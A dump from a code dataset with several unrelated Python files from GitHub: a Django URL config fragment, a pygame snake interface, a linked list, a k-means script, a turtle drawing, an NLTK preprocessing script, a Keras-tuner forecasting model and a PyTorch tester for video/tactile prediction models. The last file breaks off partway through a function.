name='room-detail'),\n path('expenses/', TotalDuePerMonthDetailView.as_view(), name='utility-detail'),\n path('expenses/monthlydues', monthlydues, name='monthlydues'),\n path('accounts//', AccountDetailView.as_view(), name='account-detail'),\n\n]\n\n","repo_name":"ccsf-house-management-app/house-management-app","sub_path":"house_app/house_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10255402880","text":"import pygame\nfrom vector import rotated_left, rotated_right\n\ndef ai_interface(sim, net):\n input = sim.are_moves_valid() + sim.new_food_distances()\n # print(sim.new_coll_distances(), sim.extra_coll_distances())\n action = net.activate(input)\n sim.actuator(action)\n sim.move_snake()\n \n\ndef human_interface(sim, net=None):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sim.finished = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sim._snake.turn_right()\n elif event.key == pygame.K_e:\n sim._snake.turn_left()","repo_name":"JanFidor/SnakePythonNEAT","sub_path":"snake_interfaces.py","file_name":"snake_interfaces.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41989093552","text":"class Node:\n def __init__ (self , data):\n self.data = data\n self.next = None\n\nclass LinkesList:\n def __init__ (self):\n self.head = None\n self.last = None\n\n def append(self, new_data):\n new_node = Node(new_data)\n\n if(self.head == None):\n self.head = new_node\n else:\n self.last.next = new_node\n self.last = new_node\n\n\n\n def deleteNode(self, val):\n temp = self.head\n\n if(temp is not None):\n if(temp.data == val):\n self.head = temp.next\n temp = None\n return\n\n while temp.data is not None:\n if(temp.data == val):\n break\n prev = temp\n temp = temp.next\n\n if (temp == None):\n\n return\n\n prev.next = temp.next\n temp = None\n\n\n\n\n\n\n def printList(self):\n temp = self.head\n while(temp):\n print(\" %d \" % (temp.data)),\n temp = temp.next\n\n\nif __name__ ==' __main__':\n llist = LinkesList()\n llist.append(1)\n llist.append(2)\n llist.append(3)\n llist.append(4)\n llist.append(5)\n llist.append(6)\n\n print(\"Linkedlist is : \")\n llist.printList()\n\n llist.deleteNode(6)\n\n print(\"Linkedlist after val removal :\")\n llist.printList()\n\n\n\n\n\n\n\n","repo_name":"lionfreak007/self_practice","sub_path":"Lkdlst_remv.py","file_name":"Lkdlst_remv.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7609109941","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\n\ndata = loadmat('ex7data2.mat') # loading the image data.\nA = data['X']\n\npoints = np.array(A)\n\nclusters = 3 # no. of clusters.\n\nmeans = np.zeros((clusters, 2)) # means or centroids.\n\nfor i in range(clusters):\n\trand1 = int(np.random.random(1)*10)\n\trand2 = int(np.random.random(1)*8)\n\tmeans[i, 0] = points[rand1, 0]\n\tmeans[i, 1] = points[rand2, 1]\n\ndef distance(x1, y1, x2, y2):\n\tdist = np.sqrt(np.square(x1 - x2) + np.square(y1 - y2))\n\treturn dist\n\nflag = 10\n\nindex = np.zeros(A.shape[0])\n\n#k-means algorithm.\n\nwhile(flag > 0):\n\tfor j in range(len(points)):\n\t\tminv = 1000\n\t\ttemp = -1\n\t\tfor k in range(clusters):\n\t\t\tx1 = points[j, 0]\n\t\t\ty1 = points[j, 1]\n\t\t\tx2 = means[k, 0]\n\t\t\ty2 = means[k, 1]\n\t\t\tif(distance(x1, y1, x2, y2) < minv):\n\t\t\t\tminv = distance(x1, y1, x2, y2)\n\t\t\t\ttemp = k\n\t\t\t\tindex[j] = k\t\n\t\n\tfor k in range(clusters):\n\t\tsumx = 0\n\t\tsumy = 0\n\t\tcount = 0\n\t\tfor j in range(len(points)):\n\t\t\tif(index[j] == k):\n\t\t\t\tsumx += points[j, 0]\n\t\t\t\tsumy += points[j, 1] \n\t\t\t\tcount += 1\n\t\tif(count == 0):\n\t\t\tcount = 1\t\t\n\t\tmeans[k, 0] = float(sumx/count)\n\t\tmeans[k, 1] = float(sumy/count)\t\t\n\t\t\n\t\t'''\n\t\tplt.scatter(points[:, 0], points[:, 1])\n\t\tplt.scatter(means[:, 0], means[:, 1])\n\t\tplt.show()\n\t\t'''\n\tflag -= 1\n\n\ncluster1 = points[np.where(index == 0)[0],:] \ncluster2 = points[np.where(index == 1)[0],:] \ncluster3 = points[np.where(index == 2)[0],:]\n\n#plotting the clusters.\n\nfig, ax = plt.subplots(figsize=(12,8)) \nax.scatter(cluster1[:,0], cluster1[:,1], s=30, color='r', label='Cluster 1') \nax.scatter(cluster2[:,0], cluster2[:,1], s=30, color='g', label='Cluster 2') \nax.scatter(cluster3[:,0], cluster3[:,1], s=30, color='b', label='Cluster 3') \nax.legend() \nplt.show()\n","repo_name":"adithbharadwaj/Machine-Learning","sub_path":"clustering/k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6640696632","text":"import turtle\r\nimport random\r\n\r\n# Set up the canvas\r\nturtle.title(\"Turtle\")\r\n\r\n# Draw a triangle\r\nt = turtle.Turtle()\r\nt.speed(0)\r\nt.penup()\r\nt.goto(-800, -400)\r\nt.pendown()\r\nfor i in range(100):\r\n # Generate a random hex color\r\n color = '#%06x' % random.randint(0, 0xFFFFFF)\r\n t.color(color, color)\r\n t.begin_fill()\r\n t.circle(50, steps=3+i)\r\n t.end_fill()\r\n t.penup()\r\n # Move up 30\r\n if t.pos()[1] >= 300:\r\n t.goto(t.pos()[0]+150, -400)\r\n else:\r\n t.goto(t.pos()[0], t.pos()[1]+150)\r\n t.pendown()\r\n\r\nturtle.done()","repo_name":"Bluebear645/school","sub_path":"4-3일 수업.py","file_name":"4-3일 수업.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42758974099","text":"import csv\r\nimport numpy as np\r\nimport sys, string\r\nimport nltk\r\nfrom numpy.lib.function_base import append\r\nfrom PreProcesssHPData import vectorize\r\nnltk.download('averaged_perceptron_tagger')\r\n\r\n\r\ndef main():\r\n wordsFile = sys.argv[1]\r\n output = sys.argv[2]\r\n vocabFile = sys.argv[3]\r\n timeFile = sys.argv[4]\r\n\r\n vocab = []\r\n with open(vocabFile, 'r', encoding=\"utf8\") as vf:\r\n for line in vf:\r\n vocab.append(line.strip())\r\n\r\n timeToWordDict = {}\r\n with open(wordsFile, 'r') as wf:\r\n reader = csv.reader(wf)\r\n for row in reader:\r\n timeToWordDict[float(row[1])] = row[0]\r\n\r\n TRs = []\r\n with open(timeFile, 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n TRs.append(row[0])\r\n \r\n lines = []\r\n for i in range(len(TRs)):\r\n currTR = [float(tr) for tr in TRs[i-4:i]]\r\n wordIndexes = []\r\n for tr in currTR:\r\n wordIndexes.extend([tr, tr+0.5, tr+1, tr+1.5])\r\n line = []\r\n for idx in wordIndexes:\r\n if idx in timeToWordDict.keys():\r\n line.append(timeToWordDict[idx].lower())\r\n else:\r\n line.append('NIL')\r\n line = ' '.join(line)\r\n line = line.translate(str.maketrans('', '', string.punctuation))\r\n currTokens = nltk.pos_tag(nltk.wordpunct_tokenize(line))\r\n line = [word for (word,_) in currTokens]\r\n if len(line) > 16:\r\n line = line[:17]\r\n lines.append(line)\r\n x = vectorize(lines, vocab, 16)\r\n print(len(x))\r\n\r\n x = np.array(x)\r\n np.save(output, x)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"HonestPretzels/CMPUT-652-BMTM","sub_path":"src/utility/MakeHPXData.py","file_name":"MakeHPXData.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"75008151503","text":"import os\nfrom time import time\n\nimport absl.logging\nimport keras_tuner as kt\nimport tensorflow as tf\nfrom keras.callbacks import EarlyStopping\nfrom keras.layers import Dense, Dropout\nfrom keras.losses import MeanSquaredError\nfrom keras.models import Sequential, load_model\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import TimeSeriesSplit\nimport matplotlib.pyplot as plt\n\nfrom models.configuration.basic_nn_config import BasicNNConfig\nfrom models.i_model import IModel\nfrom performance_analysis import cross_val_metrics, get_metrics, make_csvs\n\n\nclass BasicNNModel(IModel):\n \"\"\"\n _description_\n \"\"\"\n\n MODEL_NAME = \"Basic_nn\"\n\n @staticmethod\n def kt_model(hp: kt.HyperParameters, config: BasicNNConfig) -> Sequential:\n \"\"\"\n _description_\n\n :param hp: _description_\n :param config: _description_\n :return: _description_\n \"\"\"\n hp_activation = hp.Choice(\"activation\", values=config.activation)\n hp_learning_rate = hp.Float(\n \"lr\",\n min_value=config.learning_rate_min,\n max_value=config.learning_rate_max,\n sampling=config.learning_rate_sampling,\n )\n hp_dropout = hp.Float(\n \"dropout\",\n min_value=config.dropout_min,\n max_value=config.dropout_max,\n sampling=config.dropout_sampling,\n )\n hp_neuron_pct = hp.Float(\n \"NeuronPct\",\n min_value=config.neuron_pct_min,\n max_value=config.neuron_pct_max,\n sampling=config.neuron_pct_sampling,\n )\n hp_neuron_shrink = hp.Float(\n \"NeuronShrink\",\n min_value=config.neuron_shrink_min,\n max_value=config.neuron_shrink_max,\n sampling=config.neuron_shrink_sampling,\n )\n hp_max_neurons = hp.Int(\n \"neurons\",\n min_value=config.neurons_min,\n max_value=config.neurons_max,\n step=config.neurons_step,\n )\n\n neuron_count = int(hp_neuron_pct * hp_max_neurons)\n layers = 0\n\n model = Sequential()\n\n while neuron_count > 5 and layers < 5:\n model.add(Dense(units=neuron_count, activation=hp_activation))\n model.add(Dropout(hp_dropout))\n layers += 1\n neuron_count = int(neuron_count * hp_neuron_shrink)\n\n model.add(Dense(1, \"linear\"))\n\n model.compile(\n loss=MeanSquaredError(),\n optimizer=Adam(learning_rate=hp_learning_rate),\n metrics=[\n \"mean_squared_error\",\n \"mean_absolute_error\",\n \"mean_absolute_percentage_error\",\n ],\n )\n\n return model\n\n def train(\n self,\n X_train,\n y_train,\n y_scaler,\n config: BasicNNConfig,\n ):\n \"\"\"\n Train the model\n\n :param X_train: _description_\n :param y_train: _description_\n :param y_scaler: _description_\n :param config: _description_\n \"\"\"\n tuner = kt.Hyperband(\n BasicNNModel.kt_model,\n objective=\"mean_absolute_percentage_error\",\n max_epochs=config.epochs,\n factor=3,\n directory=config.model_directory / (config.set_name + \"_kt_dir\"),\n project_name=\"kt_model_\" + str(config.future),\n overwrite=True,\n )\n\n monitor = EarlyStopping(\n monitor=\"mean_absolute_percentage_error\",\n min_delta=1,\n patience=5,\n verbose=0,\n mode=\"auto\",\n restore_best_weights=True,\n )\n\n tuner.search(\n X_train,\n y_train,\n verbose=0,\n epochs=config.epochs,\n validation_split=0.2,\n batch_size=config.batch_size,\n callbacks=[monitor],\n )\n\n best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]\n model = tuner.hypermodel.build(best_hps)\n\n # Split on a 3 monthly basis\n tss = TimeSeriesSplit(n_splits=10, test_size=config.epd * 90, gap=0)\n fold = 0\n total_metrics = {}\n\n for train_idx, val_idx in tss.split(X_train, y_train):\n fold_name = \"Fold_\" + str(fold)\n X_t = X_train[train_idx]\n X_v = X_train[val_idx]\n y_t = y_train[train_idx]\n y_v = y_train[val_idx]\n\n if fold == 9:\n history = model.fit(\n X_t,\n y_t,\n verbose=0,\n epochs=config.epochs,\n callbacks=[monitor],\n batch_size=config.batch_size,\n validation_data=(X_v, y_v),\n )\n graphs_directory = os.getcwd() + \"/graphs\"\n self.save_plots(\n history, graphs_directory, config.set_name, config.future\n )\n model.save(\n config.model_directory\n / (f\"{config.set_name}_{self.MODEL_NAME.lower()}_{config.future}\")\n )\n\n model.fit(\n X_t,\n y_t,\n verbose=0,\n epochs=config.epochs,\n callbacks=[monitor],\n batch_size=config.batch_size,\n )\n preds = model.predict(X_v, verbose=0)\n preds = y_scaler.inverse_transform(preds)\n metrics = get_metrics(preds, y_v, 1, self.MODEL_NAME)\n total_metrics[fold_name] = metrics\n\n fold += 1\n\n cross_val_metrics(\n total_metrics,\n config.set_name,\n config.future,\n self.MODEL_NAME,\n )\n\n def predict(self, model, X_test, y_test, y_scaler, config: BasicNNConfig):\n \"\"\"\n _description_\n\n :param model: _description_\n :param X_test: _description_\n :param y_test: _description_\n :param y_scaler: _description_\n :param config: _description_\n :return: _description_\n \"\"\"\n folder_path = os.getcwd()\n model_directory = folder_path + r\"\\models\"\n csv_directory = folder_path + r\"\\csvs\"\n\n model = load_model(\n f\"{model_directory}/{config.set_name}_{self.MODEL_NAME.lower()}_{config.future}\"\n )\n predictions = model.predict(X_test)\n predictions = y_scaler.inverse_transform(predictions).reshape(-1)\n y_test = y_scaler.inverse_transform(y_test).reshape(-1)\n\n # MA: Not sure if this is right, but could use something like this to get the dates\n pred_dates_test = X_test.index.dt.strftime(\"%Y-%m-%d\").values\n\n make_csvs(\n csv_directory,\n predictions,\n y_test,\n pred_dates_test,\n config.set_name,\n config.future,\n self.MODEL_NAME,\n )\n\n print(\n \"Finished running basic prediction on future window {0}\".format(\n config.future\n )\n )\n\n metric_outputs = get_metrics(predictions, y_test, 0, self.MODEL_NAME)\n return metric_outputs\n\n def evaluate(self, X_train, y_train, y_scaler, config: BasicNNConfig):\n \"\"\"\n _description_\n\n :param X_train: _description_\n :param y_train: _description_\n :param y_scaler: _description_\n :param config: _description_\n :return: _description_\n \"\"\"\n time_start = time.time()\n\n absl.logging.set_verbosity(absl.logging.ERROR)\n tf.compat.v1.logging.set_verbosity(30)\n\n self.train(X_train, y_train, y_scaler, config)\n\n print(f\"Finished evaluating basic nn for future {config.future}\")\n\n time_end = time.time()\n\n return time_end - time_start\n\n def save_plots(self, history, config: BasicNNConfig):\n \"\"\"\n _description_\n\n :param history: _description_\n :type history: _type_\n :param graphs_directory: _description_\n :type graphs_directory: _type_\n :param set_name: _description_\n :type set_name: _type_\n :param future: _description_\n :type future: _type_\n \"\"\"\n graph_names = {\n \"Loss\": \"loss\",\n \"MAE\": \"mean_absolute_error\",\n \"MSE\": \"mean_squared_error\",\n \"MAPE\": \"mean_absolute_percentage_error\",\n }\n\n for name, value in graph_names.items():\n graph_loc = f\"{config.graphs_directory}/{config.set_name}_{self.MODEL_NAME}_{config.future}_{name}.png\"\n if os.path.exists(graph_loc):\n os.remove(graph_loc)\n\n val_name = \"val_\" + value\n plt.plot(history.history[value])\n plt.plot(history.history[val_name])\n plt.title(f\"Basic NN {name} for {config.set_name} {config.future}\")\n plt.ylabel(name)\n plt.xlabel(\"epoch\")\n plt.legend([\"train\", \"test\"], loc=\"upper left\")\n plt.savefig(graph_loc)\n","repo_name":"MattAmos/Energy-Forecasting","sub_path":"src/models/basic_nn.py","file_name":"basic_nn.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38684904605","text":"# -*- coding: utf-8 -*-\n# RUN IN PYTHON 3\nimport os\nimport sys\nimport csv\nimport cv2\nimport click\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\n\nfrom tqdm import tqdm\nfrom datetime import datetime\nfrom torch.utils.data import Dataset\n\nimport torch\nimport torch.nn as nn\nimport torchvision\n\n# standard video and tactile prediction models:\nfrom universal_networks.SVG import Model as SVG\nfrom universal_networks.SVTG_SE import Model as SVTG_SE\nfrom universal_networks.SVG_MMFM import Model as SVG_MMFM\nfrom universal_networks.SPOTS_SVG_ACTP import Model as SPOTS_SVG_ACTP\nfrom universal_networks.SPOTS_SVG_ACTP_STP import Model as SPOTS_SVG_ACTP_STP\nfrom universal_networks.SPOTS_SVG_ACTP_STP_SAMESIZE import Model as SPOTS_SVG_ACTP_STP_SAMESIZE\n\n# Tactile enhanced models:\nfrom universal_networks.SVG_TE import Model as SVG_TE\n\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\nfrom math import exp\n\nclass PSNR:\n \"\"\"Peak Signal to Noise Ratio\n img1 and img2 have range [0, 255]\"\"\"\n\n def __init__(self):\n self.name = \"PSNR\"\n\n @staticmethod\n def __call__(img1, img2):\n mse = torch.mean((img1 - img2) ** 2)\n return 20 * torch.log10(255.0 / torch.sqrt(mse))\n\ndef gaussian(window_size, sigma):\n gauss = torch.Tensor([exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)])\n return gauss / gauss.sum()\n\ndef create_window(window_size, channel):\n _1D_window = gaussian(window_size, 1.5).unsqueeze(1)\n _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze (0).unsqueeze (0)\n window = Variable (_2D_window.expand (channel, 1, window_size, window_size).contiguous ())\n return window\n\ndef _ssim(img1, img2, window, window_size, channel, size_average=True):\n mu1 = F.conv2d (img1, window, padding=window_size // 2, groups=channel)\n mu2 = F.conv2d (img2, window, padding=window_size // 2, groups=channel)\n\n mu1_sq = mu1.pow (2)\n mu2_sq = mu2.pow (2)\n mu1_mu2 = mu1 * mu2\n\n sigma1_sq = F.conv2d (img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq\n sigma2_sq = F.conv2d (img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq\n sigma12 = F.conv2d (img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2\n\n C1 = 0.01 ** 2\n C2 = 0.03 ** 2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n\n if size_average:\n return ssim_map.mean ()\n else:\n return ssim_map.mean (1).mean (1).mean (1)\n\nclass SSIM (torch.nn.Module):\n def __init__(self, window_size=11, size_average=True):\n super (SSIM, self).__init__ ()\n self.window_size = window_size\n self.size_average = size_average\n self.channel = 1\n self.window = create_window (window_size, self.channel)\n\n def forward(self, img1, img2):\n (_, channel, _, _) = img1.size()\n\n if channel == self.channel and self.window.data.type () == img1.data.type ():\n window = self.window\n else:\n window = create_window (self.window_size, channel)\n\n if img1.is_cuda:\n window = window.cuda (img1.get_device ())\n window = window.type_as (img1)\n\n self.window = window\n self.channel = channel\n\n return _ssim (img1, img2, window, self.window_size, channel, self.size_average)\n\ndef ssim(img1, img2, window_size=11, size_average=True):\n (_, channel, _, _) = img1.size ()\n window = create_window (window_size, channel)\n\n if img1.is_cuda:\n window = window.cuda (img1.get_device ())\n window = window.type_as (img1)\n\n return _ssim (img1, img2, window, window_size, channel, size_average)\n\nclass BatchGenerator:\n def __init__(self, batch_size, image_width, features):\n self.batch_size = batch_size\n self.image_size = image_width\n self.features = features\n\n def load_full_data(self):\n dataset_test = FullDataSet(self.features)\n test_loader = torch.utils.data.DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False)\n self.data_map = []\n return test_loader\n\nclass FullDataSet(torch.utils.data.Dataset):\n def __init__(self, features):\n self.features = features\n self.samples = data_map[1:]\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n value = self.samples[idx]\n robot = np.load(tdd + value[0]).astype(np.float32)\n\n if uti == True:\n tactile = np.load(tdd + value[2]).astype(np.float32)\n else:\n tactile = np.load(tdd + value[1]).astype(np.float32)\n if tr:\n tactile = np.random.normal(0, 1, tactile.shape).astype(np.float32)\n tactile = (tactile - tactile.min()) / (tactile.max() - tactile.min())\n # tactile[:self.features[\"n_past\"]] = 0.0\n if tz:\n tactile[:] = 0.5 \n\n image = []\n for image_name in np.load(tdd + value[3]):\n if udd:\n image.append(np.load(tdd + image_name).astype(np.float32))\n else:\n image.append(np.load(tdd + image_name).astype(np.float32)[:, :, 0:3])\n image= np.array(image)\n if ir:\n image[:self.features[\"n_past\"]] = 0.0\n if iz:\n image[:] = 0.5\n\n return [torch.tensor(robot), torch.tensor(image), torch.tensor(tactile)]\n\n\nclass UniversalTester:\n def __init__(self, features):\n self.list_of_p_measures = [\"MAE\", \"MSE\", \"PSNR\", \"SSIM\", \"MAE_last\", \"MSE_last\", \"PSNR_last\", \"SSIM_last\"]\n\n saved_model = torch.load(features[\"model_save_path\"] + features[\"model_save_name\"] + features[\"model_name_save_appendix\"])\n self.features = saved_model['features']\n\n if features[\"model_name\"] == \"SVG\": self.model = SVG(features = self.features)\n elif features[\"model_name\"] == \"SVTG_SE\": self.model = SVTG_SE(features = self.features)\n elif features[\"model_name\"] == \"SVG_MMFM\": self.model = SVG_MMFM(features = self.features)\n elif features[\"model_name\"] == \"SPOTS_SVG_ACTP\": self.model = SPOTS_SVG_ACTP(features = self.features)\n elif features[\"model_name\"] == \"SVG_TE\": self.model = SVG_TE(features = self.features)\n elif features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP\": self.model = SPOTS_SVG_ACTP_STP(features = self.features)\n elif features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP_SAMESIZE\": self.model = SPOTS_SVG_ACTP_STP_SAMESIZE(features = self.features)\n\n self.test_features = features\n self.model.load_model(full_model=saved_model)\n saved_model = None\n\n BG = BatchGenerator(self.features[\"batch_size\"], self.features[\"image_width\"], self.features)\n self.test_full_loader = BG.load_full_data()\n\n self.test_model()\n\n def test_model(self):\n batch_losses = []\n batch_tactile_losses = []\n self.model.set_test()\n for index, batch_features in enumerate(self.test_full_loader):\n print(str(index) + \"\\r\")\n\n groundtruth_scene, predictions_scene, groundtruth_tactile, prediction_tactile = self.format_and_run_batch(batch_features, test=True) # run the model\n if self.test_features[\"quant_analysis\"] == True: # and prediction_tactile == 100:\n batch_losses.append(self.calculate_scores(predictions_scene, groundtruth_scene[self.features[\"n_past\"]:], prediction_tactile))\n if self.test_features[\"quant_tactile_analysis\"] == True:\n print(groundtruth_tactile)\n batch_tactile_losses.append(self.calculate_tactile_scores(prediction_tactile, groundtruth_tactile[self.features[\"n_past\"]]))\n\n batches_to_save = [0,1,2,3]\n if self.test_features[\"qual_analysis\"] == True and index in batches_to_save:\n print(\"here, index: \" + str(index))\n self.save_images(predictions_scene, groundtruth_scene[self.features[\"n_past\"]:], index)\n \n if self.test_features[\"qual_tactile_analysis\"] == True and index in batches_to_save:\n self.save_tactile(prediction_tactile, groundtruth_tactile[self.features[\"n_past\"]:], index)\n\n if self.test_features[\"quant_analysis\"] == True:\n print(batch_losses)\n batch_losses = np.array(batch_losses)\n \n if self.test_features[\"seen\"]: data_save_path_append = \"seen_\"\n else: data_save_path_append = \"unseen_\"\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores_alltimesteps.npy\", batch_losses)\n lines = [[float(i) for i in j] for j in batch_losses[0][2]]\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores_alltimesteps.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n full_losses = [sum(batch_losses[:,0,i]) / batch_losses.shape[0] for i in range(batch_losses.shape[2])]\n last_ts_losses = [sum(batch_losses[:,1,i]) / batch_losses.shape[0] for i in range(batch_losses.shape[2])]\n\n full_losses = [float(i) for i in full_losses]\n last_ts_losses = [float(i) for i in last_ts_losses]\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores.npy\", batch_losses)\n lines = full_losses + last_ts_losses\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n if self.test_features[\"quant_tactile_analysis\"] == True:\n print(batch_tactile_losses)\n batch_tactile_losses = np.array(batch_tactile_losses)\n\n if self.test_features[\"seen\"]: data_save_path_append = \"seen_\"\n else: data_save_path_append = \"unseen_\"\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores_alltimesteps.npy\", batch_tactile_losses)\n lines = [[float(i) for i in j] for j in batch_tactile_losses[0][2]]\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores_alltimesteps.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n full_losses = [sum(batch_tactile_losses[:,0,i]) / batch_tactile_losses.shape[0] for i in range(batch_tactile_losses.shape[2])]\n last_ts_losses = [sum(batch_tactile_losses[:,1,i]) / batch_tactile_losses.shape[0] for i in range(batch_tactile_losses.shape[2])]\n\n full_losses = [float(i) for i in full_losses]\n last_ts_losses = [float(i) for i in last_ts_losses]\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores.npy\", batch_tactile_losses)\n lines = full_losses + last_ts_losses\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n\n def save_tactile(self, prediction_tactile, groundtruth_tactile, index):\n try:\n os.mkdir(self.test_features[\"data_save_path\"] + \"push_\" + str(index))\n except FileExistsError or FileNotFoundError:\n pass\n\n predictions_tactile = prediction_tactile.cpu().detach().numpy()\n groundtruth_tactile = groundtruth_tactile.cpu().detach().numpy()\n\n for j in range(0, predictions_tactile.shape[1]):\n for i in range(0, predictions_tactile.shape[0]):\n np.save(self.test_features[\"data_save_path\"] + \"push_\" + str(index) + \"/PR_tactile_batch_\" + str(j) + \"_timestep_\" + str(i) + \".npy\", predictions_tactile[i,j])\n np.save(self.test_features[\"data_save_path\"] + \"push_\" + str(index) + \"/GT_tactile_batch_\" + str(j) + \"_timestep_\" + str(i) + \".npy\", groundtruth_tactile[i,j])\n\n def save_images(self, predictions_scene, groundtruth_scene, index):\n save_location = self.test_features[\"data_save_path\"] + \"push_\" + str(index)\n try:\n os.mkdir(save_location)\n except FileExistsError or FileNotFoundError:\n print(\"Directory already exists: \", save_location)\n pass\n\n predictions_scene = predictions_scene.cpu().detach().numpy()\n groundtruth_scene = groundtruth_scene.cpu().detach().numpy()\n for j in range(0, predictions_scene.shape[1]):\n for i in range(0, predictions_scene.shape[0]):\n im = predictions_scene[i][j].T * 255\n im = Image.fromarray(im[:,:,::-1].astype(np.uint8))\n im.save(save_location + \"/PR_batch_\" + str(j) + \"_timestep_\" + str(i) + \".png\")\n\n im = groundtruth_scene[i][j].T * 255\n im = Image.fromarray(im[:,:,::-1].astype(np.uint8))\n im.save(save_location + \"/GT_batch_\" + str(j) + \"_timestep_\" + str(i) + \".png\")\n\n def calculate_tactile_scores(self, prediction_tactile, groundtruth_tactile):\n tactile_losses_full, tactile_losses_last, tactile_losses_alltimesteps = [],[],[]\n for criterion in [nn.L1Loss(), nn.MSELoss()]: #, PSNR(), SSIM(window_size=self.features[\"image_width\"])]:\n tactile_batch_loss_full = []\n for i in range(prediction_tactile.shape[0]):\n tactile_batch_loss_full.append(criterion(prediction_tactile[i], groundtruth_tactile[i]).cpu().detach().data)\n\n tactile_losses_alltimesteps.append(tactile_batch_loss_full)\n tactile_losses_full.append(sum(tactile_batch_loss_full) / len(tactile_batch_loss_full))\n tactile_losses_last.append(tactile_batch_loss_full[-1])\n\n return tactile_losses_full, tactile_losses_last, tactile_losses_alltimesteps\n\n def calculate_scores(self, prediction_scene, groundtruth_scene, prediction_tactile=None, groundtruth_tactile=None):\n scene_losses_full, scene_losses_last, scene_losses_alltimesteps = [],[],[]\n for criterion in [nn.L1Loss(), nn.MSELoss(), PSNR(), SSIM(window_size=self.features[\"image_width\"])]: #, SSIM(window_size=self.image_width)]:\n scene_batch_loss_full = []\n for i in range(prediction_scene.shape[0]):\n scene_batch_loss_full.append(criterion(prediction_scene[i], groundtruth_scene[i]).cpu().detach().data)\n\n scene_losses_alltimesteps.append(scene_batch_loss_full)\n scene_losses_full.append(sum(scene_batch_loss_full) / len(scene_batch_loss_full))\n scene_losses_last.append(criterion(prediction_scene[-1], groundtruth_scene[-1]).cpu().detach().data) # t+5\n\n return [scene_losses_full, scene_losses_last, scene_losses_alltimesteps]\n\n def format_and_run_batch(self, batch_features, test):\n # # \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" REMOVE THIS !!!!!!!!!\n self.features[\"n_eval\"] = 17\n # # \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" REMOVE THIS !!!!!!!!!\n\n cut_required = False\n if batch_features[1].shape[0] != self.features[\"batch_size\"]:\n cut_required = batch_features[1].shape[0]\n # add zeros of the data to reach the batch_size:\n if self.features[\"using_tactile_images\"]:\n batch_features[2] = torch.cat((batch_features[2], torch.zeros(self.features[\"batch_size\"] - batch_features[2].shape[0], self.features[\"n_eval\"], self.features[\"image_width\"], self.features[\"image_width\"], int(self.features[\"channels\"] / 2))), dim=0)\n batch_features[1] = torch.cat((batch_features[1], torch.zeros(self.features[\"batch_size\"] - batch_features[1].shape[0], self.features[\"n_eval\"], self.features[\"image_width\"], self.features[\"image_width\"], int(self.features[\"channels\"] / 2))), dim=0)\n else:\n batch_features[2] = torch.cat((batch_features[2], torch.zeros(self.features[\"batch_size\"] - batch_features[2].shape[0], self.features[\"n_eval\"], batch_features[2].shape[2], batch_features[2].shape[3])), dim=0)\n batch_features[1] = torch.cat((batch_features[1], torch.zeros(self.features[\"batch_size\"] - batch_features[1].shape[0], self.features[\"n_eval\"], self.features[\"image_width\"], self.features[\"image_width\"], self.features[\"channels\"])), dim=0)\n 